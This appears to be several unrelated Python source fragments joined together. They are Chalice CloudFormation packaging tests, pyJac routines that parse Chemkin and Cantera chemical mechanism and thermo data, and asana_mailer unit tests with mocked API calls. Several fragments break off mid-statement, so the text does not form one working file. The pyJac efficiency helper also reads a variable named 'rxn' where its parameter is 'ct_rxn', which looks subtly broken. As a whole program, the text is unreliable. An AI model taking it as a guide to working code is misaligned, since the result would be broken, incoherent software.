y_data_c = [int(data_point) for data_point | |
'Type': 'AWS::ApiGatewayV2::Integration',
'Properties': {
'ApiId': {
'Ref': 'WebsocketAPI'
},
'ConnectionType': 'INTERNET',
'ContentHandlingStrategy': 'CONVERT_TO_TEXT',
'IntegrationType': 'AWS_PROXY',
'IntegrationUri': {
'Fn::Sub': [
(
'arn:${AWS::Partition}:apigateway'
':${AWS::Region}:lambda:path'
'/2015-03-31/functions/arn:${AWS::Partition}'
':lambda:${AWS::Region}:${AWS::AccountId}'
':function:${WebsocketHandler}/invocations'
),
{'WebsocketHandler': {'Ref': handler}}
],
}
}
}
# Route for the handler.
assert resources['%sRoute' % handler] == {
'Type': 'AWS::ApiGatewayV2::Route',
'Properties': {
'ApiId': {
'Ref': 'WebsocketAPI'
},
'RouteKey': route,
'Target': {
'Fn::Join': [
'/',
[
'integrations',
{'Ref': '%sAPIIntegration' % handler},
]
]
}
}
}
# Ensure the deployment is created. It must manually depend on
# the routes since it cannot be created for WebsocketAPI that has no
# routes. The API has no such implicit contract so CloudFormation can
# deploy things out of order without the explicit DependsOn.
depends_on = set(resources['WebsocketAPIDeployment'].pop('DependsOn'))
assert set(['WebsocketConnectRoute',
'WebsocketMessageRoute',
'WebsocketDisconnectRoute']) == depends_on
assert resources['WebsocketAPIDeployment'] == {
'Type': 'AWS::ApiGatewayV2::Deployment',
'Properties': {
'ApiId': {
'Ref': 'WebsocketAPI'
}
}
}
# Ensure the stage is created.
resources['WebsocketAPIStage'] = {
'Type': 'AWS::ApiGatewayV2::Stage',
'Properties': {
'ApiId': {
'Ref': 'WebsocketAPI'
},
'DeploymentId': {'Ref': 'WebsocketAPIDeployment'},
'StageName': 'api',
}
}
# Ensure the outputs are created
assert template['Outputs'] == {
'WebsocketConnectHandlerArn': {
'Value': {
'Fn::GetAtt': ['WebsocketConnect', 'Arn']
}
},
'WebsocketConnectHandlerName': {
'Value': {'Ref': 'WebsocketConnect'}},
'WebsocketMessageHandlerArn': {
'Value': {
'Fn::GetAtt': ['WebsocketMessage', 'Arn']
}
},
'WebsocketMessageHandlerName': {
'Value': {'Ref': 'WebsocketMessage'}},
'WebsocketDisconnectHandlerArn': {
'Value': {
'Fn::GetAtt': ['WebsocketDisconnect', 'Arn']
}
},
'WebsocketDisconnectHandlerName': {'Value': {
'Ref': 'WebsocketDisconnect'}},
'WebsocketConnectEndpointURL': {
'Value': {
'Fn::Sub': (
'wss://${WebsocketAPI}.execute-api.'
'${AWS::Region}.${AWS::URLSuffix}/api/'
)
}
},
'WebsocketAPIId': {'Value': {'Ref': 'WebsocketAPI'}}
}
def test_managed_iam_role(self):
role = models.ManagedIAMRole(
resource_name='default_role',
role_name='app-dev',
trust_policy=LAMBDA_TRUST_POLICY,
policy=models.AutoGenIAMPolicy(document={'iam': 'policy'}),
)
template = self.template_gen.generate([role])
resources = template['Resources']
assert len(resources) == 1
cfn_role = resources['DefaultRole']
assert cfn_role['Type'] == 'AWS::IAM::Role'
assert cfn_role['Properties']['Policies'] == [
{'PolicyName': 'DefaultRolePolicy',
'PolicyDocument': {'iam': 'policy'}}
]
# Verify the trust policy is specific to the region
assert cfn_role['Properties']['AssumeRolePolicyDocument'] == {
'Statement': [{'Action': 'sts:AssumeRole',
'Effect': 'Allow',
'Principal': {'Service': 'lambda.amazonaws.com'},
'Sid': ''}],
'Version': '2012-10-17'}
# Ensure the RoleName is not in the resource properties
# so we don't require CAPABILITY_NAMED_IAM.
assert 'RoleName' not in cfn_role['Properties']
def test_single_role_generated_for_default_config(self,
sample_app_lambda_only):
# The sample_app has one lambda function.
# We'll add a few more and verify they all share the same role.
@sample_app_lambda_only.lambda_function()
def second(event, context):
pass
@sample_app_lambda_only.lambda_function()
def third(event, context):
pass
config = Config.create(chalice_app=sample_app_lambda_only,
project_dir='.',
autogen_policy=True,
api_gateway_stage='api')
template = self.generate_template(config)
roles = [resource for resource in template['Resources'].values()
if resource['Type'] == 'AWS::IAM::Role']
assert len(roles) == 1
# The lambda functions should all reference this role.
functions = [
resource for resource in template['Resources'].values()
if resource['Type'] == 'AWS::Serverless::Function'
]
role_names = [
function['Properties']['Role'] for function in functions
]
assert role_names == [
{'Fn::GetAtt': ['DefaultRole', 'Arn']},
{'Fn::GetAtt': ['DefaultRole', 'Arn']},
{'Fn::GetAtt': ['DefaultRole', 'Arn']},
]
def test_vpc_config_added_to_function(self, sample_app_lambda_only):
config = Config.create(chalice_app=sample_app_lambda_only,
project_dir='.',
autogen_policy=True,
api_gateway_stage='api',
security_group_ids=['sg1', 'sg2'],
subnet_ids=['sn1', 'sn2'])
template = self.generate_template(config)
resources = template['Resources'].values()
lambda_fns = [resource for resource in resources
if resource['Type'] == 'AWS::Serverless::Function']
assert len(lambda_fns) == 1
vpc_config = lambda_fns[0]['Properties']['VpcConfig']
assert vpc_config['SubnetIds'] == ['sn1', 'sn2']
assert vpc_config['SecurityGroupIds'] == ['sg1', 'sg2']
def test_helpful_error_message_on_s3_event(self, sample_app):
@sample_app.on_s3_event(bucket='foo')
def handler(event):
pass
config = Config.create(chalice_app=sample_app,
project_dir='.',
api_gateway_stage='api')
options = PackageOptions(mock.Mock(spec=TypedAWSClient))
with pytest.raises(NotImplementedError) as excinfo:
self.generate_template(config, 'dev', options)
# Should mention the decorator name.
assert '@app.on_s3_event' in str(excinfo.value)
# Should mention you can use `chalice deploy`.
assert 'chalice deploy' in str(excinfo.value)
def test_can_package_sns_handler(self, sample_app):
@sample_app.on_sns_message(topic='foo')
def handler(event):
pass
config = Config.create(chalice_app=sample_app,
project_dir='.',
api_gateway_stage='api')
template = self.generate_template(config)
sns_handler = template['Resources']['Handler']
assert sns_handler['Properties']['Events'] == {
'HandlerSnsSubscription': {
'Type': 'SNS',
'Properties': {
'Topic': {
'Fn::Sub': (
'arn:${AWS::Partition}:sns:${AWS::Region}'
':${AWS::AccountId}:foo'
)
}
},
}
}
def test_can_package_sns_arn_handler(self, sample_app):
arn = 'arn:aws:sns:space-leo-1:1234567890:foo'
@sample_app.on_sns_message(topic=arn)
def handler(event):
pass
config = Config.create(chalice_app=sample_app,
project_dir='.',
api_gateway_stage='api')
template = self.generate_template(config)
sns_handler = template['Resources']['Handler']
assert sns_handler['Properties']['Events'] == {
'HandlerSnsSubscription': {
'Type': 'SNS',
'Properties': {
'Topic': arn,
}
}
}
def test_can_package_sqs_handler(self, sample_app):
@sample_app.on_sqs_message(queue='foo', batch_size=5)
def handler(event):
pass
config = Config.create(chalice_app=sample_app,
project_dir='.',
api_gateway_stage='api')
template = self.generate_template(config)
sns_handler = template['Resources']['Handler']
assert sns_handler['Properties']['Events'] == {
'HandlerSqsEventSource': {
'Type': 'SQS',
'Properties': {
'Queue': {
'Fn::Sub': (
'arn:${AWS::Partition}:sqs:${AWS::Region}'
':${AWS::AccountId}:foo'
)
},
'BatchSize': 5,
},
}
}
def test_can_package_kinesis_handler(self, sample_app):
@sample_app.on_kinesis_record(stream='mystream', batch_size=5)
def handler(event):
pass
config = Config.create(chalice_app=sample_app,
project_dir='.',
api_gateway_stage='api')
template = self.generate_template(config)
sns_handler = template['Resources']['Handler']
assert sns_handler['Properties']['Events'] == {
'HandlerKinesisEventSource': {
'Type': 'Kinesis',
'Properties': {
'Stream': {
'Fn::Sub': (
'arn:${AWS::Partition}:kinesis:${AWS::Region}'
':${AWS::AccountId}:stream/mystream'
)
},
'BatchSize': 5,
'StartingPosition': 'LATEST',
},
}
}
def test_can_package_dynamodb_handler(self, sample_app):
@sample_app.on_dynamodb_record(stream_arn='arn:aws:...:stream',
batch_size=5)
def handler(event):
pass
config = Config.create(chalice_app=sample_app,
project_dir='.',
api_gateway_stage='api')
template = self.generate_template(config)
ddb_handler = template['Resources']['Handler']
assert ddb_handler['Properties']['Events'] == {
'HandlerDynamodbEventSource': {
'Type': 'DynamoDB',
'Properties': {
'Stream': 'arn:aws:...:stream',
'BatchSize': 5,
'StartingPosition': 'LATEST',
},
}
}
def test_can_generate_custom_domain_name(self, sample_app):
config = Config.create(
chalice_app=sample_app,
project_dir='.',
api_gateway_stage='api',
api_gateway_endpoint_type='EDGE',
api_gateway_custom_domain={
"certificate_arn": "my_cert_arn",
"domain_name": "example.com",
"tls_version": "TLS_1_2",
"tags": {"foo": "bar", "bar": "baz"},
}
)
template = self.generate_template(config)
domain = template['Resources']['ApiGatewayCustomDomain']
mapping = template['Resources']['ApiGatewayCustomDomainMapping']
assert domain == {
'Type': 'AWS::ApiGateway::DomainName',
'Properties': {
'CertificateArn': 'my_cert_arn',
'DomainName': 'example.com',
'SecurityPolicy': 'TLS_1_2',
'EndpointConfiguration': {
'Types': ['EDGE']
},
'Tags': [
{'Key': 'bar',
'Value': 'baz'},
{'Key': 'foo',
'Value': 'bar'}
]
}
}
assert mapping == {
'Type': 'AWS::ApiGateway::BasePathMapping',
'Properties': {
'DomainName': {'Ref': 'ApiGatewayCustomDomain'},
'RestApiId': {'Ref': 'RestAPI'},
'Stage': {'Ref': 'RestAPI.Stage'},
'BasePath': '(none)',
}
}
def test_can_generate_domain_for_regional_endpoint(self, sample_app):
config = Config.create(
chalice_app=sample_app,
project_dir='.',
api_gateway_stage='api',
api_gateway_endpoint_type='REGIONAL',
api_gateway_custom_domain={
"certificate_arn": "my_cert_arn",
"domain_name": "example.com",
}
)
template = self.generate_template(config)
domain = template['Resources']['ApiGatewayCustomDomain']
mapping = template['Resources']['ApiGatewayCustomDomainMapping']
assert domain == {
'Type': 'AWS::ApiGateway::DomainName',
'Properties': {
'RegionalCertificateArn': 'my_cert_arn',
'DomainName': 'example.com',
'EndpointConfiguration': {
'Types': ['REGIONAL']
}
}
}
assert mapping == {
'Type': 'AWS::ApiGateway::BasePathMapping',
'Properties': {
'DomainName': {'Ref': 'ApiGatewayCustomDomain'},
'RestApiId': {'Ref': 'RestAPI'},
'Stage': {'Ref': 'RestAPI.Stage'},
'BasePath': '(none)',
}
}
def test_can_generate_domain_for_ws_endpoint(self, sample_websocket_app):
config = Config.create(
chalice_app=sample_websocket_app,
project_dir='.',
api_gateway_stage='api',
websocket_api_custom_domain={
"certificate_arn": "my_cert_arn",
"domain_name": "example.com",
'tags': {'foo': 'bar', 'bar': 'baz'},
}
)
template = self.generate_template(config)
domain = template['Resources']['WebsocketApiCustomDomain']
mapping = template['Resources']['WebsocketApiCustomDomainMapping']
assert domain == {
'Type': 'AWS::ApiGatewayV2::DomainName',
'Properties': {
'DomainName': 'example.com',
'DomainNameConfigurations': [
{'CertificateArn': 'my_cert_arn',
'EndpointType': 'REGIONAL'},
],
'Tags': {
'foo': 'bar',
'bar': 'baz'
},
}
}
assert mapping == {
'Type': 'AWS::ApiGatewayV2::ApiMapping',
'Properties': {
'DomainName': {'Ref': 'WebsocketApiCustomDomain'},
'ApiId': {'Ref': 'WebsocketAPI'},
'Stage': {'Ref': 'WebsocketAPIStage'},
'ApiMappingKey': '(none)',
}
}
class TestTemplateDeepMerger(object):
def test_can_merge_without_changing_identity(self):
merger = package.TemplateDeepMerger()
src = {}
dst = {}
result = merger.merge(src, dst)
assert result is not src
assert result is not dst
assert src is not dst
def test_does_not_mutate(self):
merger = package.TemplateDeepMerger()
src = {'foo': 'bar'}
dst = {'baz': 'buz'}
merger.merge(src, dst)
assert src == {'foo': 'bar'}
assert dst == {'baz': 'buz'}
def test_can_add_element(self):
merger = package.TemplateDeepMerger()
src = {'foo': 'bar'}
dst = {'baz': 'buz'}
result = merger.merge(src, dst)
assert result == {
'foo': 'bar',
'baz': 'buz',
}
def test_can_replace_element(self):
merger = package.TemplateDeepMerger()
src = {'foo': 'bar'}
dst = {'foo': 'buz'}
result = merger.merge(src, dst)
assert result == {
'foo': 'bar',
}
def test_can_merge_list(self):
merger = package.TemplateDeepMerger()
src = {'foo': [1, 2, 3]}
dst = {}
result = merger.merge(src, dst)
assert result == {
'foo': [1, 2, 3],
}
def test_can_merge_nested_elements(self):
merger = package.TemplateDeepMerger()
src = {
'foo': {
'bar': 'baz',
},
}
dst = {
'foo': {
'qux': 'quack',
},
}
result = merger.merge(src, dst)
assert result == {
'foo': {
'bar': 'baz',
'qux': 'quack',
}
}
def test_can_merge_nested_list(self):
merger = package.TemplateDeepMerger()
src = {
'foo': {
'bar': 'baz',
},
}
dst = {
'foo': {
'qux': [1, 2, 3, 4],
},
}
result = merger.merge(src, dst)
assert result == {
'foo': {
'bar': 'baz',
'qux': [1, 2, 3, 4],
}
}
def test_list_elements_are_replaced(self):
merger = package.TemplateDeepMerger()
src = {
'list': [{'foo': 'bar'}],
}
dst = {
'list': [{'foo': 'buz'}],
}
result = merger.merge(src, dst)
assert result == {
'list': [{'foo': 'bar'}],
}
def test_merge_can_change_type(self):
merger = package.TemplateDeepMerger()
src = {
'key': 'foo',
}
dst = {
'key': 1,
}
result = merger.merge(src, dst)
assert result == {
'key': 'foo'
}
@pytest.mark.parametrize('filename,is_yaml', [
('extras.yaml', True),
('extras.YAML', True),
('extras.yml', True),
('extras.YML', True),
('extras.foo.yml', True),
('extras', False),
('extras.json', False),
('extras.yaml.json', False),
('foo/bar/extras.yaml', True),
('foo/bar/extras.YAML', True),
])
def test_to_cfn_resource_name(filename, is_yaml):
assert package.YAMLTemplateSerializer.is_yaml_template(filename) == is_yaml
@pytest.mark.parametrize('yaml_contents,expected', [
('foo: bar', {'foo': 'bar'}),
('foo: !Ref bar', {'foo': {'Ref': 'bar'}}),
('foo: !GetAtt Bar.Baz', {'foo': {'Fn::GetAtt': ['Bar', 'Baz']}}),
('foo: !FooBar [!Baz YetAnother, "hello"]',
{'foo': {'Fn::FooBar': [{'Fn::Baz': 'YetAnother'}, 'hello']}}),
('foo: !SomeTag {"a": "1"}', {'foo': {'Fn::SomeTag': {'a': | |
species missing \n'
'data. Either specify file, or ensure complete data in\n'
'mechanism file with THERMO option.')
sys.exit(1)
# Check for missing thermo data again
missing_mw = [spec.name for spec in specs if not spec.mw]
if missing_mw:
logger = logging.getLogger(__name__)
logger.error('Missing thermo data for ' + ', '.join(missing_mw))
sys.exit(1)
# determine reaction type enums
for reac in reacs:
reac.finalize(len(specs))
for spec in specs:
spec.finalize()
if sort_type:
reacs = sort_reactions(reacs, sort_type)
return (elems, specs, reacs)
def read_thermo(filename, elems, specs):
"""Read and interpret thermodynamic database for species data.
Reads the thermodynamic file and returns the species thermodynamic
coefficients as well as the species-specific temperature range
values (if given).
Parameters
----------
filename : str
Name of thermo database file.
elems : list of str
List of element names in mechanism.
specs : list of `SpecInfo`
List of species in mechanism.
Returns
-------
None
"""
# choose our element names to enable comparison between Chemkin & Cantera
elem_name_map = {e.lower(): e for e in elem_wt}
with open(filename, 'r') as file:
# loop through intro lines
while True:
line = file.readline()
# skip blank or commented lines
if re.search(r'^\s*$', line) or re.search(r'^\s*!', line):
continue
# skip 'thermo' at beginning
if 'thermo' in line.lower():
break
# next line either has common temperature ranges or first species
last_line = file.tell()
line = file.readline()
line_split = line.split()
if line_split[0][0:1].isdigit():
T_ranges = utils.read_str_num(line)
else:
# no common temperature info
file.seek(last_line)
# default
# now start reading species thermo info
while True:
# first line of species info
line = file.readline()
# don't convert to lowercase, needs to match thermo for Chemkin
# break if end of file
if line is None or line[0:3].lower() == 'end':
break
# skip blank/commented line
if re.search(r'^\s*$', line) or re.search(r'^\s*!', line):
continue
# species name, columns 0:18
spec = line[0:18].strip()
# Apparently, in some cases, notes are in the
# columns of shorter species names, so make
# sure no spaces.
if spec.find(' ') > 0:
spec = spec[0: spec.find(' ')]
# now need to determine if this species is in mechanism
if next((sp for sp in specs if sp.name == spec), None):
sp_ind = next(i for i in range(len(specs))
if specs[i].name == spec
)
else:
# not in mechanism, read next three lines and continue
line = file.readline()
line = file.readline()
line = file.readline()
continue
# set species to the one matched
spec = specs[sp_ind]
# ensure not reading the same species more than once...
if spec.mw:
# already done! skip next three lines
line = file.readline()
line = file.readline()
line = file.readline()
continue
# now get element composition of species, columns 24:44
# each piece of data is 5 characters long (2 for element, 3 for #)
elem_str = utils.split_str(line[24:44], 5)
for e_str in elem_str:
e = e_str[0:2].strip()
# skip if blank
if e == '' or e == '0':
continue
# may need to convert to float first, in case of e.g. "1."
e_num = float(e_str[2:].strip())
e_num = int(e_num)
spec.elem.append([elem_name_map[e.lower()], e_num])
# calculate molecular weight
spec.mw += e_num * elem_wt[e.lower()]
# temperatures for species
T_spec = utils.read_str_num(line[45:74])
T_low = T_spec[0]
T_high = T_spec[1]
if len(T_spec) == 3:
T_com = T_spec[2]
else:
T_com = T_ranges[1]
spec.Trange = [T_low, T_com, T_high]
# second species line
line = file.readline()
coeffs = utils.split_str(line[0:75], 15)
spec.hi[0] = float(coeffs[0])
spec.hi[1] = float(coeffs[1])
spec.hi[2] = float(coeffs[2])
spec.hi[3] = float(coeffs[3])
spec.hi[4] = float(coeffs[4])
# third species line
line = file.readline()
coeffs = utils.split_str(line[0:75], 15)
spec.hi[5] = float(coeffs[0])
spec.hi[6] = float(coeffs[1])
spec.lo[0] = float(coeffs[2])
spec.lo[1] = float(coeffs[3])
spec.lo[2] = float(coeffs[4])
# fourth species line
line = file.readline()
coeffs = utils.split_str(line[0:75], 15)
spec.lo[3] = float(coeffs[0])
spec.lo[4] = float(coeffs[1])
spec.lo[5] = float(coeffs[2])
spec.lo[6] = float(coeffs[3])
# stop reading if all species in mechanism accounted for
if not next((sp for sp in specs if sp.mw == 0.0), None):
break
return None
def read_mech_ct(filename=None, gas=None, sort_type=None):
"""Read and interpret Cantera-format mechanism file.
Parameters
----------
filename : str
Reaction mechanism filename (e.g. 'mech.cti'). Optional.
gas : `cantera.Solution` object
Existing Cantera Solution object to be used. Optional.
sort_type : :class:`enum_types.reaction_sorting`
If not None, sort the reactions in this mechanism according to the supplied
scheme
Returns
-------
elems : list of str
List of elements in mechanism.
specs : list of `SpecInfo`
List of species in mechanism.
reacs : list of `ReacInfo`
List of reactions in mechanism.
units : str
Units of reactions' Arrhenius coefficients
"""
if not CANTERA_FLAG:
logger = logging.getLogger(__name__)
logger.error('Cantera not installed. Cannot interpret Cantera-format'
' mechanism.')
sys.exit(1)
if filename:
gas = ct.Solution(filename)
elif not gas:
logger = logging.getLogger(__name__)
logger.error('Need either filename or Cantera Solution object.')
sys.exit(1)
# Elements
elems = gas.element_names
for e, wt in zip(elems, gas.atomic_weights):
if e.lower() not in elem_wt:
elem_wt[e.lower()] = wt
# choose our element names to enable comparison between Chemkin & Cantera
elem_name_map = {e.lower(): e for e in elem_wt}
# Species
specs = []
for i, sp in enumerate(gas.species_names):
# Get Species object
species = gas.species(i)
if isinstance(species.thermo, ct.NasaPoly2):
spec = chem.SpecInfo(sp)
elif isinstance(species.thermo, ct.Nasa9PolyMultiTempRegion):
spec = chem.SpecInfoN9(sp)
spec.mw = gas.molecular_weights[i]
# Species elemental composition
for e in species.composition:
spec.elem.append([elem_name_map[e.lower()], int(species.composition[e])])
# Species thermodynamic properties
coeffs = species.thermo.coeffs
if isinstance(species.thermo, ct.NasaPoly2):
spec.Trange = [species.thermo.min_temp, coeffs[0],
species.thermo.max_temp
]
spec.hi = coeffs[1:8]
spec.lo = coeffs[8:15]
elif isinstance(species.thermo, ct.Nasa9PolyMultiTempRegion):
spec.nzones = int(coeffs[0])
spec.lo = np.resize(spec.lo, (spec.nzones, 9))
spec.hi = np.resize(spec.hi, (spec.nzones, 9))
# Set up temperature brackets.
for i in range(0, spec.nzones):
spec.Trange.append(coeffs[int(i*11) + 1])
# Add the upper bound:
if i == spec.nzones-1:
spec.Trange.append(coeffs[int(i*11) + 2])
# Read in the coeffs.
for i in range(0, spec.nzones-1):
spec.lo[i][:] = coeffs[(int(i*11)+3):(int(i*11)+12)]
spec.hi[i][:] = coeffs[(int(i*11)+14):(int(i*11)+23)]
# Fill low range for the last zone as well
spec.lo[int(spec.nzones-1)][:] = coeffs[((spec.nzones-1)*11+3):((spec.nzones-1)*11+12)]
else:
logger = logging.getLogger(__name__)
logger.error('Unsupported thermo form for species ' + sp)
sys.exit(1)
specs.append(spec)
# Reactions
reacs = []
# Cantera internally uses joules/kmol for activation energy
E_fac = act_energy_fact['joules/kmole']
def handle_effiencies(reac, ct_rxn):
"""Convert Cantera `cantera.Reaction`'s third body efficienicies
to pyJac's internal format, and return updated reaction
Parameters
----------
reac : `ReacInfo`
The pyJac reaction to update
ct_rxn : `Reaction` object
Corresponding cantera reaction to pull the third bodies from
Returns
-------
updated_reac: `ReacInfo`
The updated pyjac reaction with appropriate third body efficiencies
"""
# See if single species acts as third body
if rxn.default_efficiency == 0.0 \
and len(ct_rxn.efficiencies.keys()) == 1\
and list(ct_rxn.efficiencies.values())[0] == 1\
and reac.pdep:
reac.pdep_sp = list(rxn.efficiencies.keys())[0]
else:
for sp in gas.species_names:
if sp in ct_rxn.efficiencies:
reac.thd_body_eff.append([sp, ct_rxn.efficiencies[sp]])
elif ct_rxn.default_efficiency != 1.0:
reac.thd_body_eff.append([sp, ct_rxn.default_efficiency])
return reac
for rxn in gas.reactions():
if isinstance(rxn, ct.ThreeBodyReaction):
# Instantiate internal reaction based on Cantera Reaction data.
reac = chem.ReacInfo(rxn.reversible,
list(rxn.reactants.keys()),
list(rxn.reactants.values()),
list(rxn.products.keys()),
list(rxn.products.values()),
rxn.rate.pre_exponential_factor,
rxn.rate.temperature_exponent,
rxn.rate.activation_energy * E_fac
)
reac.thd_body = True
reac = handle_effiencies(reac, rxn)
elif isinstance(rxn, ct.FalloffReaction) and \
not isinstance(rxn, ct.ChemicallyActivatedReaction):
reac = chem.ReacInfo(rxn.reversible,
list(rxn.reactants.keys()),
list(rxn.reactants.values()),
list(rxn.products.keys()),
list(rxn.products.values()),
rxn.high_rate.pre_exponential_factor,
rxn.high_rate.temperature_exponent,
rxn.high_rate.activation_energy * E_fac
)
reac.pdep = True
reac = handle_effiencies(reac, rxn)
reac.low = [rxn.low_rate.pre_exponential_factor,
rxn.low_rate.temperature_exponent,
rxn.low_rate.activation_energy * E_fac
]
if rxn.falloff.type == 'Troe':
reac.troe = True
reac.troe_par = rxn.falloff.parameters.tolist()
do_warn = False
if reac.troe_par[1] == 0:
reac.troe_par[1] = 1e-30
do_warn = True
if reac.troe_par[2] == 0:
reac.troe_par[2] = 1e-30
do_warn = True
if do_warn:
logger = logging.getLogger(__name__)
logger.warn('Troe parameters in reaction {} modified to avoid'
' division by zero!.'.format(len(reacs)))
elif rxn.falloff.type == 'SRI':
reac.sri = True
reac.sri_par = rxn.falloff.parameters.tolist()
elif isinstance(rxn, ct.ChemicallyActivatedReaction):
reac = chem.ReacInfo(rxn.reversible,
list(rxn.reactants.keys()),
list(rxn.reactants.values()),
list(rxn.products.keys()),
list(rxn.products.values()),
rxn.low_rate.pre_exponential_factor,
rxn.low_rate.temperature_exponent,
rxn.low_rate.activation_energy * E_fac
)
reac.pdep = True
reac = handle_effiencies(reac, rxn)
reac.high = [rxn.high_rate.pre_exponential_factor,
rxn.high_rate.temperature_exponent,
rxn.high_rate.activation_energy * E_fac
]
if rxn.falloff.type == 'Troe':
reac.troe = True
reac.troe_par = rxn.falloff.parameters.tolist()
do_warn = False
if reac.troe_par[1] == 0:
reac.troe_par[1] = 1e-30
do_warn = True
if reac.troe_par[2] == 0:
reac.troe_par[2] = 1e-30
do_warn = True
if do_warn:
logging.warn('Troe parameters in reaction {} modified to avoid'
' division by zero!.'.format(len(reacs)))
elif rxn.falloff.type == 'SRI':
reac.sri = True
reac.sri_par = rxn.falloff.parameters.tolist()
elif isinstance(rxn, ct.PlogReaction):
reac = chem.ReacInfo(rxn.reversible,
| |
<reponame>palantir/asana_mailer
import argparse
import codecs
import datetime
import glob
import os
import os.path
import smtplib
import unittest
import dateutil
import mock
import nose
import requests
import asana_mailer
from requests.exceptions import HTTPError
class AsanaAPITestCase(unittest.TestCase):
@classmethod
def setup_class(cls):
cls.api = asana_mailer.AsanaAPI('api_key')
def test_init(self):
self.assertEqual(type(self).api.api_key, 'api_key')
@mock.patch('json.loads')
@mock.patch('requests.get')
def test_get(self, mock_get_request, mock_json_loads):
api = type(self).api
mock_response = mock_get_request.return_value
mock_response.status_code = requests.codes.ok
with self.assertRaises(AttributeError):
api.get('not_an_endpoint')
with self.assertRaises(KeyError):
api.get('project', {'invalid_path_var': 'invalid'})
auth = ('api_key', '')
# No Path Vars
api.get('project')
mock_get_request.assert_called_once_with('{0}{1}'.format(
api.asana_api_url, api.project_endpoint), params=None, auth=auth)
mock_get_request.reset_mock()
api.get('project', {'project_id': u'123'})
mock_response.json.assert_called_once_with()
mock_response.reset_mock()
api.get('project_tasks', {'project_id': u'123'}, expand='.')
mock_response.json.assert_called_once_with()
mock_get_request.reset_mock()
api.get(
'project_tasks', {'project_id': u'123'}, expand='.',
params={'opt_expand': 'name'})
full_endpoint = api.project_tasks_endpoint.format(
project_id=u'123')
mock_get_request.assert_called_once_with(
'{0}{1}'.format(api.asana_api_url, full_endpoint),
params={'opt_expand': 'name'}, auth=auth)
mock_response.reset_mock()
mock_response.status_code = requests.codes.not_found
mock_response.content = (
'{"errors": [{"message": "404 Not Found"}]}'
)
mock_response.raise_for_status.side_effect = HTTPError()
with self.assertRaises(HTTPError):
api.get('task_stories', {'task_id': u'123'})
# No content should still throw exception
mock_response.content = None
with self.assertRaises(HTTPError):
api.get('task_stories', {'task_id': u'123'})
mock_response.raise_for_status.side_effect = None
mock_json_loads.side_effect = TypeError()
try:
api.get('project', {'project_id': u'123'})
except TypeError:
self.fail(
'Asana.get should handle TypeError during JSON Error'
'Conversion')
mock_json_loads.side_effect = ValueError()
try:
api.get('project', {'project_id': u'123'})
except ValueError:
self.fail(
'Asana.get should handle TypeError during JSON Error'
'Conversion')
mock_get_request.assertHasCalls([
mock.call(url='{}{}'.format(
type(api).asana_api_url,
type(api).project_endpoint.format(project_id=u'123')),
auth=auth),
mock.call(url='{}{}'.format(
type(api).asana_api_url,
type(api).project_tasks_endpoint.format(project_id=u'123')),
auth=auth),
mock.call(url='{}{}'.format(
type(api).asana_api_url,
type(api).task_stories_endpoint.format(task_id=u'123')),
auth=auth),
])
class ProjectTestCase(unittest.TestCase):
def setUp(self):
self.id = u'123'
self.name = '<NAME>'
self.description = 'Project Description'
self.project = asana_mailer.Project(
self.id, self.name, self.description)
def test_init(self):
self.assertEquals(self.project.id, self.id)
self.assertEquals(self.project.name, self.name)
self.assertEquals(self.project.description, self.description)
self.assertEquals(self.project.sections, [])
self.project = asana_mailer.Project(
self.id, self.name, self.description, ['123'])
self.assertEquals(self.project.sections, ['123'])
@mock.patch('asana_mailer.Project.filter_tasks')
@mock.patch('asana_mailer.Section.create_sections')
def test_create_project(self, mock_create_sections, mock_filter_tasks):
mock_asana = mock.MagicMock()
current_time_utc = datetime.datetime.now(dateutil.tz.tzutc())
now = current_time_utc.isoformat()
project_json = {
u'name': 'My Project',
u'notes': 'My Project Description'
}
project_tasks_json = [
{
'id': u'123', u'name': u'Test Section:',
u'assignee': None, u'completed': False,
u'notes': u'test_description', u'due_on': None,
u'tags': []
},
{
u'id': u'456', u'name': u'More Work',
u'assignee': None,
u'completed': False,
u'notes': u'more_test_description',
u'due_on': None,
u'tags': []
},
]
task_comments_json = (
(
{u'text': u'blah', u'type': u'comment'},
{u'text': u'blah2', u'type': u'not_a_comment'}
),
(
{u'text': u'blah', u'type': 'comment'},
{u'text': u'blah3', u'type': 'comment'}
)
)
all_calls = [project_json, project_tasks_json]
all_calls.extend(task_comments_json)
mock_asana.get.side_effect = all_calls
new_section = asana_mailer.Section(u'Test Section:')
new_tasks = (
asana_mailer.Task(
u'Do Work', u'test_user', True,
dateutil.parser.parse(now), u'test_description',
dateutil.parser.parse(now),
[u'Tag #{}'.format(i) for i in xrange(5)], [
{u'text': u'blah', u'type': u'comment'},
{u'text': u'blah2', u'type': u'not_a_comment'}
]
),
asana_mailer.Task(
u'More Work', None, False, None, u'more_test_description',
None, [], [
{u'text': u'blah', u'type': 'comment'},
{u'text': u'blah3', u'type': 'comment'}
]
)
)
task_comments = {
u'123': [
{u'text': u'blah', u'type': u'comment'},
],
u'456': [
{u'text': u'blah', u'type': 'comment'},
{u'text': u'blah3', u'type': 'comment'}
]
}
new_section.add_tasks(new_tasks)
new_sections = [new_section]
mock_create_sections.return_value = new_sections
# No Filters
new_project = asana_mailer.Project.create_project(
mock_asana, u'123', current_time_utc)
self.assertEquals(new_project.sections, new_sections)
mock_create_sections.assert_called_once_with(
project_tasks_json, task_comments)
mock_filter_tasks.assert_called_once_with(
current_time_utc, section_filters=None, task_filters=None)
# Completed Lookback
mock_create_sections.return_value = new_sections
mock_asana.get.side_effect = all_calls
lookback_hours = 10
new_project = asana_mailer.Project.create_project(
mock_asana, u'123', current_time_utc,
completed_lookback_hours=lookback_hours)
completed_since = (current_time_utc - datetime.timedelta(
hours=lookback_hours)).replace(microsecond=0).isoformat()
mock_asana.get.assert_any_call(
'project_tasks', {'project_id': u'123'}, expand='.',
params={'completed_since': completed_since})
# Section Filters
section_filters = (u'Other Section:',)
mock_filter_tasks.reset_mock()
mock_create_sections.reset_mock()
mock_asana.get.side_effect = all_calls
new_project = asana_mailer.Project.create_project(
mock_asana, u'123', current_time_utc,
section_filters=section_filters)
self.assertEquals(new_project.sections, new_sections)
mock_create_sections.assert_called_once_with(
project_tasks_json, {})
mock_filter_tasks.assert_called_once_with(
current_time_utc, section_filters=section_filters,
task_filters=None)
# Task Filters
mock_filter_tasks.reset_mock()
mock_create_sections.reset_mock()
mock_asana.get.side_effect = all_calls
task_filters = [u'Tag #1']
new_project = asana_mailer.Project.create_project(
mock_asana, u'123', current_time_utc,
task_filters=task_filters)
self.assertEquals(new_project.sections, new_sections)
mock_create_sections.assert_called_once_with(
project_tasks_json, {})
mock_filter_tasks.assert_called_once_with(
